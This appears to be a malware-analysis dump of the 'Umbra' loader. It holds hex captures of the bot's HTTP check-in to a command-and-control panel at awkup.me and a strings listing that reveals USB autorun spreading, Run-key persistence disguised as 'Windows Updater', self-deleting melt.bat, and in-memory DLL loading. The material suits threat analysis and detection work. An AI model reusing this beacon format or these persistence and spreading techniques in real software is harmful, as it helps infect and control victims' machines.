0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0


Strings
 - 
,  x 
, -
 - 
,  x 
, 

@000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF
1.2.0
a1b2c3
[autorun]
:\autorun.inf
BILGE:TONYUKUK:BEN:
&cmdid=
del "
del "melt.bat"
DLL0
DVCLAL
hermalit
http://
HTTP/1.0
jjjj
kernel32.dll
K:ERTI
localhost/Panel/Panel/bot.php|localhost/Panel/Panel/bot.php|www.google.de/Panel/Panel/bot.php
melt.bat
mode=1&UID=
mode=2&UID=
mode=3&UID=
M:TABGAC:ILINGE:KILINDIM:T
open=
PACKAGEINFO
ping -n 1 localhost
POST
RK:BODUNU:TABGACKA:K
SOFTWARE\Microsoft\
Software\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
:start
starter.exe
\UID
umbra
UMBRALOADER1235
USB Spreading
&version=
Windows Updater
winsvchost.exe
> >$>(>,>
>->>>~>
0 0$0(0,0004080<0@0`0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0t0x0
0 0$0*0.040?0E0I0Z0c0l0x0
0#0*0.04080>0I0O0S0d0m0v0
0"0*020:0b0
0"0*020:0B0J0R0Z0b0j0r0z0
,0004080<0@0D0H0L0P0p0
0*0^0z0
0&080 3
0,0B0J0R0Z0b0j0r0z0
0#0F0N0V0^0f0n0v0~0
0123456789ABCDEF
0123456789ABCDEF$A@
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<|<
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
= =$=(=,=0=4=8=<=@=D=H=P=T=X=\=`=d=h=l=p=x=|=
:	:0:6:=:L:Q:X:m:
; ;$;(;,;0;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
? ?$?(?,?0?8?<?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
090C0M0|0
101P14787<7@7D7H7
1 1$1(1,1014181<1@1D1H1L1P1T1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
111=1H1
1"1'1@1P1a1m1{1
1 1@1$7(7,7074787
1-1>1J1O1T1[1b1j1t1
111N1V1X2x2
1>1F1N1
1(2@2Y2v2
:%=1=G=M=U=Z=j=o=t=
;%;1;N;W;
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
2 2N3Y3h3
2B2^2j2~2
<2<:<G<M<[<j<w<
2prjLoader_XE2
303K3Q3i3v3~3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
333<3q3x3
3*393D3
3)484C4l4
>#?3?=?X?
404A4d4~4
4+424J4l4
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4,4;4B4M4]4
4/4S4k4
=(=,=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
4K4k4h6
5&515@5Y5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
555=5B5g5p5
586H6X6h6x6
5H5^5u5
>5?@?S?_?f?p?z?
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
668E8L8
6 6X6t6z6
6,7B7Y7
6C7d7t7
6F7Q7V7]7
6K6T6[6x6
707@7N7^7f7n7v7~7
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
7'7-7;7V7q7{7
7,8084888<8H8P<T<X<\<`<d<h<l<p<t<x<
7%838A8O8]8k8
787<7@7D7P7T7X7\7`7d7p7t7
7J8u8z8
<7<q<{<
8.868>8l8
8&8.868>8F8N8V8^8f8n8v8~8
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8)8F8W8h8y8
8Y8k8u8
919F9Y9f9
9"9*929:9B9J9R9Z9b9
9$9*989?9I9t9
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
9*9@9E9L9q9
9(9^9h9
9;:F:M:R:Y:
advapi32.dll
:!:?:a:l:<;@;F;J;T;g;k;q;u;
AnsiString
An unexpected memory leak has occurred. 
<&<B<c<|<
:B:G:k:p:K<P<|<
B.rsrc
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
BTMemoryGetProcAddress: name <-> ordinal number don't match
BTMemoryGetProcAddress: no export table found
 BTMemoryLoadLibary: BuildImportTable failed
BTMemoryLoadLibary: Can't attach library
BTMemoryLoadLibary: dll dos header is not valid
BTMemoryLoadLibary: Get DLLEntyPoint failed
BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid
BTMemoryLoadLibary: VirtualAlloc failed
BTMemoryModule
BuildImportTable: can't load library: 
BuildImportTable: GetProcAddress failed
BuildImportTable: ReallocMemory failed
 bytes: 
:	:-:C:`:
C0V0U1
Cardinal
>">;>C>]>e>
CloseHandle
CoCreateGuid
Content-Type: application/x-www-form-urlencoded
CopyFileW
CoTaskMemFree
CreateFileW
CreateMutexW
CreateThread
:#;(;/;D;[;
`.data
DeleteCriticalSection
.didata
dwError
.edata
=:=E=V=k=x=
example.dll
ExitProcess
FastMM Embarcadero Edition (c) 2004 - 2011 Pierre le Riche
FinalizeSections: VirtualProtect failed
FindClose
FindFirstFileW
FindResourceW
FreeLibrary
>=>F>R>Y>
GetACP
GetCommandLineW
GetComputerNameW
GetCurrentThreadId
GetDriveTypeW
GetLastError
GetLocalTime
GetModuleFileNameW
GetModuleHandleW
GetPluginInfo
GetProcAddress
GetProcessHeap
GetStartupInfoW
GetStdHandle
GetSystemInfo
GetThreadPreferredUILanguages
GetThreadUILanguage
GetVersion
GetVersionExW
GetWindowsDirectoryW
<.=G=x=
HeapAlloc
HeapFree
HttpOpenRequestW
HttpSendRequestA
.idata
InitializeCriticalSection
InternetCloseHandle
InternetConnectW
InternetOpenUrlW
InternetOpenW
InternetQueryDataAvailable
InternetReadFile
IsBadReadPtr
`.itext
kernel32.dll
=??K?R?d?
=$=;>K>U>n>
;!;&;K;v;
loader
LoadLibraryA
LoadResource
LocalAlloc
LocalFree
LockResource
<l?o>n
lstrlenW
MessageBoxA
MultiByteToWideChar
ole32.dll
oleaut32.dll
OutputDebugStringW
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
PluginStart
QQQQQQ
QQQQQQQ
QQQQQQQQ
RaiseException
.rdata
RegCloseKey
RegCreateKeyW
RegDeleteValueW
RegNotifyChangeKeyValue
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
@.reloc
RtlUnwind
Runtime error     at 00000000
SetFileAttributesW
SetThreadLocale
SetThreadPreferredUILanguages
shell32.dll
ShellExecuteW
SHFolder.dll
SHGetFolderPathW
SizeofResource
string
StringFromCLSID
	strResult
SVWRPj
SysFreeString
SysInit
SysReAllocStringLen
System
System.Types
System.Types	untParser
System.UITypes
TerminateThread
The sizes of unexpected leaked medium and large blocks are: 
The unexpected small block leaks are:
This program must be run under Win32
THTTPResult
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tNh,M@
	TStrArray
u5hXk@
Unexpected Memory Leak
UnhandledExceptionFilter
UnicodeString
Unknown
untInstallation
untMD5
>untMD5
untParser
untPlugins
 untPlugins
untRegistry
untSettings
untUtils
user32.dll
:U:_:v:
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
VWUUhl2@
VWUUhP4@
WideCharToMultiByte
Winapi.IpExport
Winapi.Qos
Winapi.ShellAPI
Winapi.SHFolder
Winapi.Windows
Winapi.WinInet
Winapi.Winsock2
wininet.dll
WriteFile
yuntUtils
_^[YY]
;Z]_^[
Zdcibz~-X}ilyh
zdc~{neb~y#huh
;<;zl~i
Z_^[XX